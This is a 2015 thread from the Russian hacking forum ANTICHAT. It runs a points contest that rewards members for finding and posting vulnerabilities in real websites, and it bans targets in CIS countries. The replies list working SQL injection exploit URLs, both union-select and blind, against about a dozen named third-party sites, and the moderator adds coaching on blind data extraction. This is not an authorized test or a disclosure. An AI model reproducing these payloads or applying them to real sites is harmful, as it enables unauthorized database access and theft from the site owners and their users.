HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.06.2015, 18:55
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Правила:

Ваша задача найти уязвимости в веб-приложениях.

Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).

Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.

За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:

Цитата:
Сообщение от None  
Сайт: example.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://example.com/index.php?id=1 UNION SELECT 1,2,3,table_name FROM information_schema.tables
Код уязвимости:
Код:
Code:
$query = "SELECT news FROM cds WHERE id=".$_GET['id'];
Уязвимости:
  • SQL Injection (2 балла)
  • Stored XSS (2 балла)
  • Reflected XSS (1 балл)
  • Local File Inclusion (3 балла)
  • Remote File Inclusion (4 балла)
  • Remote Code Execution (5 баллов)
  • XXE (5 баллов)
  • Arbitary File Read (3 балла)

Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

Типы уязвимостей:
  • Оранжевые (с приложенным исходным кодом уязвимости)
  • Серые (эксплоит без кода)
 
Ответить с цитированием

  #2  
Старый 04.06.2015, 16:51
dmn75
Guest
Сообщений: n/a
Провел на форуме:
11777

Репутация: 1
По умолчанию

Буду первым. Если что не так подправьте

Site: dkcity.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
 
Ответить с цитированием

  #3  
Старый 04.06.2015, 17:27
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от dmn75  
dmn75 said:

Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5
Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7
тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

P. S. активнее, ребят
 
Ответить с цитированием

  #4  
Старый 04.06.2015, 17:48
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
 
Ответить с цитированием

  #5  
Старый 04.06.2015, 17:50
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )
Цитата:
Сообщение от yarbabin  
yarbabin said:

Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов
исходники с уязвимостью прибавляют баллы, но можно и без них
 
Ответить с цитированием

  #6  
Старый 04.06.2015, 18:30
dmn75
Guest
Сообщений: n/a
Провел на форуме:
11777

Репутация: 1
По умолчанию

Да, тулзой кручу.

Сайт: theatreinchicago.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8
Сайт: tsgconsumer.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0
Сайт: alicekwartler.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]
Сайт: athenscine.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20
Сайт: classifieds.chiangmaicitylife.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1
Сайт: cstv.collegesports.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5
Сайт: ctnrecruiting.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Сайт: diarionecochea.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo
Сайт: dogarchive.kennel-apbt.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1
Сайт: eu.bosscom.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://eu.bosscom.com/product.asp?id=[t]
Какой именно запрос на вывод нужен?
 
Ответить с цитированием

  #7  
Старый 04.06.2015, 18:34
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от dmn75  
dmn75 said:

Какой именно запрос на вывод нужен?
если blind, то хотя бы substring версии
 
Ответить с цитированием

  #8  
Старый 04.06.2015, 18:36
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

если blind, то хотя бы substring версии
substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
 
Ответить с цитированием

  #9  
Старый 04.06.2015, 18:52
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.
а разница?
 
Ответить с цитированием

  #10  
Старый 04.06.2015, 18:56
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

а разница?
Для развеивания шаблонного мышления.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ